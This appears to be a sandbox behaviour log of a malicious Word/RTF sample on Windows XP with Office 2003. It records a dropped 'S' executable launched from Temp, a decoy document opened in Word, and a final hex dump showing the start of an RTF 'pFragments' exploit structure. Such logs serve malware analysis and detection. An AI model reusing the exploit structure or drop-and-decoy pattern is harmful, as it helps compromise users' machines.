    \KnownDlls\NETAPI32.dll write and read and execute unknown 76360000 65536 own pid read write object name not found 1
    C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S query and write and read and execute and extend size image 5B860000 348160 own pid read write success or wait 1
    C:\WINDOWS\system32\apphelp.dll write and read and execute commit 2F80000 126976 own pid execute success or wait 1
    C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
    C:\WINDOWS\AppPatch\sysmain.sdb read commit 2F80000 1208320 own pid readonly success or wait 1
    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S query and read commit 2F80000 20480 own pid readonly success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE query and write and read and execute and extend size image 2F80000 20480 own pid readonly success or wait 1
    C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE query and read commit 2F90000 12050432 own pid readonly success or wait 1
    + Section loaded by program
    File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL write and read and execute commit 860000 12218368 own pid execute success or wait 1 30003006
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and write and read and execute image 30C90000 12263424 own pid read write success or wait 1 30003006
    \BaseNamedObjects\ShimSharedMemory write unknown 870000 57344 own pid read write success or wait 1 30003006
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit A30000 1056768 own pid execute success or wait 1 303703E2
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 303703E2
    \KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 303703E2
    C:\WINDOWS\WindowsShell.Manifest write and read and execute commit A30000 4096 own pid execute success or wait 1 303703E2
    C:\WINDOWS\WindowsShell.Manifest query and read commit A30000 4096 own pid readonly success or wait 1 303703E2
    C:\WINDOWS\WindowsShell.Manifest read commit A30000 4096 own pid readonly success or wait 1 303703E2
    \BaseNamedObjects\PrimaryWord11SharedMemoryArea read unknown 755C0000 188416 own pid read write object name not found 1 30029EE0
    \BaseNamedObjects\PrimaryWord11SharedMemoryArea query and write and read commit A90000 4096 own pid read write success or wait 1 30029EF7
    Registry Activities:
    + Key value queried
    Key Path Name Completion Count Source Address
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager CommonFilesDir success or wait 1 30002FEA
    Process Activities:
    + Process started
    PID Filepath Cmdline Flags Completion Count Source Address
    1568 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\S 0 success or wait 1 1239A2
    296 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4.doc 0 success or wait 1 123A5A
    + Process terminated
    PID Filepath Completion Count Source Address
    1888 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 123A60
    1888 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 0 123A60
    Memory Activities:
    + Memory allocated
    PID Filepath Base Length Protection Completion Count Source Address
    1888 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 21E000 123170 page read and write success or wait 1 123900
    + Memory attributes changed
    PID Filepath Base Length New Protection Old Protection Completion Count Source Address
    1888 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 30B4D000 1000 page readonly page read and write success or wait 1 30001C39
    User Activities:
    + Window created
    Window name Class name Completion Count Source Address
    OpusApp OpusApp success 1 3002919F
    _WwC _WwC success 1 300516EB
    _WwF _WwF success 1 300516EB
    _WwB _WwB success 1 3002919F
    _WwF _WwF success 1 300516EB
    _WwB _WwB success 1 3002919F
    _WwG _WwG success 1 3002919F
    6.0.2600.6028!ScrollBar SCROLLBAR success 1 300516EB
    _WwC _WwC success 1 300516EB
    6.0.2600.6028!ScrollBar SCROLLBAR success 1 300516EB
    _WwC _WwC success 1 300516EB
    _WwC _WwC success 1 300516EB
    _WwC _WwC success 1 300516EB
    + Window found
    Window name Class name HWND of window Completion Count Source Address
    no string MSOBALLOON 0 success 1 0
    no string MsoHelp10 0 success 1 0
    no string AgentAnim 0 success 1 0
    + Message sent to window
    HWND Message LParam WParam Completion Count Source Address
    A00D0 45F 0 0 success 1 30003AB6
    20132 DDE_ACK 655694 3221864475 success 1 3064C4CA
    + Window hook set
    Module Thread id Hook code Completion Count Source Address
    C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 1904 FFFFFFFF success 1 3000783A
    + Chronological sections
    Operation Data Completion Time
    Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 427760532
    Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 427766702
    Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 427770570
    Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 427771929
    Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 427773528
    Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 427774362
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 427775871
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 427776237
    Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 427821870
    Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 427826544
    Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 427831802
    Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 427839389
    Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 427843547
    Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 427851943
    Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 427858056
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 427891754
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 427896646
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 427898840
    Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 850000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 427922404
    Memory attributes changed PID: 1888 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Base: 30B4D000 Length: 1000 New Protection: page readonly Old Protection: page read and write success or wait 427944169
    Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: CommonFilesDir success or wait 427946240
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: write and read and execute Type: commit Baseaddress: 860000 Size: 12218368 Protection: execute Mapped to pid: own pid success or wait 427947953
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: query and write and read and execute Type: image Baseaddress: 30C90000 Size: 12263424 Protection: read write Mapped to pid: own pid success or wait 427952988
    Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 870000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 428004249
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL Access: write and read and execute Type: commit Baseaddress: 8C0000 Size: 774144 Protection: execute Mapped to pid: own pid success or wait 428252304
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL Access: query and read Type: commit Baseaddress: 8C0000 Size: 774144 Protection: readonly Mapped to pid: own pid success or wait 428256636
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19211106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 8C0000 Size: 774144 Protection: readonly Mapped to pid: own pid object name not found 428343390
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19211106360 Access: query and write and read Type: reserve Baseaddress: A10000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 428344745
    Section loaded Path: \KnownDlls\uxtheme.dll Access: write and read and execute Type: unknown Baseaddress: A10000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 428347181
    Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 428348970
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: A30000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 428413436
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 428417026
    Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 428424918
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: A30000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 428439457
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: A30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 428443531
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: A30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 428445789
    Window created Window Name: OpusApp Class Name: OpusApp success 428480200
    Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: A50000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 428481823
    Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 428485565
    Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 428513776
    Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: A50000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 428524488
    Section loaded Path: \KnownDlls\version.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 428528439
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: A90000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 428533623
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: A90000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 428537714
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: A90000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 428543134
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: A90000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 428545686
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: A90000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 428549127
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and write and read and execute Type: image Baseaddress: 755C0000 Size: 188416 Protection: read write Mapped to pid: own pid success or wait 428551711
    Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: read Type: unknown Baseaddress: 755C0000 Size: 188416 Protection: read write Mapped to pid: own pid object name not found 428570653
    Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: query and write and read Type: commit Baseaddress: A90000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 428570997
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL Access: write and read and execute Type: commit Baseaddress: AA0000 Size: 1753088 Protection: execute Mapped to pid: own pid success or wait 428574226
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL Access: query and read Type: commit Baseaddress: AA0000 Size: 1753088 Protection: readonly Mapped to pid: own pid success or wait 428578375
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg20321106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: AA0000 Size: 1753088 Protection: readonly Mapped to pid: own pid object name not found 428580139
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg20321106360 Access: query and write and read Type: reserve Baseaddress: C50000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 428580497
    Section loaded Path: \KnownDlls\msi.dll Access: write and read and execute Type: unknown Baseaddress: C50000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 428605860
    Section loaded Path: C:\WINDOWS\system32\msi.dll Access: query and write and read and execute Type: image Baseaddress: 7D1E0000 Size: 2867200 Protection: read write Mapped to pid: own pid success or wait 428607630
    Windows hook set Module: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 1904 Hook ID: FFFFFFFF success 429215441
    Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: CF0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 429233940
    Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 429570594
    Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: CF0000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 429584640
    Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 429631719
    Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: CF0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 429647558
    Window created Window Name: _WwC Class Name: _WwC success 430009902
    Window created Window Name: _WwF Class Name: _WwF success 430700275
    Windows found Window Name: no string Class Name: MSOBALLOON HWND: 0 success 430709191
    Windows found Window Name: no string Class Name: MsoHelp10 HWND: 0 success 430709976
    Windows found Window Name: no string Class Name: AgentAnim HWND: 0 success 430710498
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL Access: write and read and execute Type: commit Baseaddress: DA0000 Size: 966656 Protection: execute Mapped to pid: own pid success or wait 430716660
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL Access: query and write and read and execute Type: image Baseaddress: 39700000 Size: 962560 Protection: read write Mapped to pid: own pid success or wait 430718495
    Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 430727157
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E20000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 430735077
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E20000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 430737405
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E20000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 430738742
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E20000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 430740006
    Section loaded Path: \BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: E20000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 430742552
    Section loaded Path: \KnownDlls\CLBCATQ.DLL Access: write and read and execute Type: unknown Baseaddress: E20000 Size: 4096 Protection: read write Mapped to pid: own pid object name not found 430754807
    Section loaded Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid success or wait 430755422
    Section loaded Path: \KnownDlls\COMRes.dll Access: write and read and execute Type: unknown Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid object name not found 430757022
    Section loaded Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid success or wait 430757649
    Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 430760641
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL Access: write and read and execute Type: commit Baseaddress: E40000 Size: 368640 Protection: execute Mapped to pid: own pid success or wait 430853908
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 372736 Protection: read write Mapped to pid: own pid success or wait 430856266
    Section loaded Path: \BaseNamedObjects\MSCTF.GCompartListSFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: reserve Baseaddress: 10000000 Size: 372736 Protection: read write Mapped to pid: own pid object name exists 430956486
    Section loaded Path: C:\WINDOWS\system32\winlogon.exe Access: write and read and execute Type: commit Baseaddress: FC0000 Size: 507904 Protection: execute Mapped to pid: own pid success or wait 431007834
    Section loaded Path: \KnownDlls\xpsp2res.dll Access: write and read and execute Type: unknown Baseaddress: FC0000 Size: 507904 Protection: execute Mapped to pid: own pid object name not found 431013602
    Section loaded Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: FC0000 Size: 2904064 Protection: read write Mapped to pid: own pid conflicting addresses 431014391
    Section loaded Path: C:\WINDOWS\system32\sti.dll Access: write and read and execute Type: commit Baseaddress: 1590000 Size: 69632 Protection: execute Mapped to pid: own pid success or wait 432512682
    Section loaded Path: C:\WINDOWS\system32\sti.dll Access: query and write and read and execute Type: image Baseaddress: 73BA0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 432514154
    Section loaded Path: \KnownDlls\CFGMGR32.dll Access: write and read and execute Type: unknown Baseaddress: 73BA0000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 432515132
    Section loaded Path: C:\WINDOWS\system32\cfgmgr32.dll Access: query and write and read and execute Type: image Baseaddress: 74AE0000 Size: 28672 Protection: read write Mapped to pid: own pid success or wait 432515775
    Section loaded Path: \KnownDlls\setupapi.DLL Access: write and read and execute Type: unknown Baseaddress: 74AE0000 Size: 28672 Protection: read write Mapped to pid: own pid object name not found 432516816
    Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 432517393
    Message posted HWND: A00D0 Message: 45F WParam: 0 LParam: 0 success 432632817
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19521106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 432639859
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19521106360 Access: query and write and read Type: reserve Baseaddress: 1590000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 432640000
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH..FLBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432656194
    Window created Window Name: _WwB Class Name: _WwB success 432670934
    Message sent HWND: 20132 Message: DDE_ACK WParam: 655694 LParam: 3221864475 success 432671446
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19521106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15C0000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 432675095
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19531106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15C0000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 432675630
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19531106360 Access: query and write and read Type: reserve Baseaddress: 15C0000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 432675765
    Section loaded Path: \BaseNamedObjects\MSCTF.Shared.SFM.AJH Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15E0000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 432681978
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.B.FLBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432682554
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.C.FLBMB Access: query and write and read Type: commit Baseaddress: 1660000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432682932
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.D.FLBMB Access: query and write and read Type: commit Baseaddress: 1670000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432683460
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.E.FLBMB Access: query and write and read Type: commit Baseaddress: 1680000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432683823
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.F.FLBMB Access: query and write and read Type: commit Baseaddress: 1690000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432684186
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.G.FLBMB Access: query and write and read Type: commit Baseaddress: 16A0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432684549
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.H.FLBMB Access: query and write and read Type: commit Baseaddress: 16B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432684911
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.I.FLBMB Access: query and write and read Type: commit Baseaddress: 16C0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432685184
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.J.EMBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432687238
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.K.EMBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432710825
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.L.EMBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432711764
    Section loaded Path: C:\DOCUME~1\ALLUSE~1\APPLIC~1\MICROS~1\OFFICE\DATA\OPA11.BAK Access: query and write and read and execute and extend size Type: commit Baseaddress: 1660000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 432725532
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.M.ENBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432778129
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.N.ENBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432790625
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.O.ENBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432797045
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.P.DOBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432801217
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AHH.AB.DOBMB Access: query and write and read Type: commit Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432815821
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.G.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432820735
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.H.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432821121
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.I.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432821460
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.J.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432821796
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.K.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432822117
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.L.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432822438
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.M.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432822769
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.N.DOBMB Access: query and write and read and execute and extend size Type: unknown Baseaddress: 15B0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 432823094
    Section loaded Path: \BaseNamedObjects\DfSharedHeap30B4E Access: query and write and read Type: reserve Baseaddress: 1670000 Size: 4194304 Protection: read write Mapped to pid: own pid success or wait 433024042
    Section loaded Path: \BaseNamedObjects\DFMap0-199506 Access: query and write and read Type: commit Baseaddress: 1A70000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 433025954
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433031452
    File other operation Disposition: PositionInformation Data : Offset: 58531 Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc success or wait 433032252
    File read Path: C:\09D68EF693AC6B7D3ACF0DDFF0585543.doc Offset: none Length: 4096 Value: 7B 5C 72 74 66 31 7B 5C 73 68 70 7B 5C 2A 5C 73 68 70 69 6E 73 74 7B 5C 73 70 7B 5C 73 6E 20 70 46 72 61 67 6D 65 6E 74 73 7D 7B 5C 73 76 20 31 3B 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 success or wait 433033063
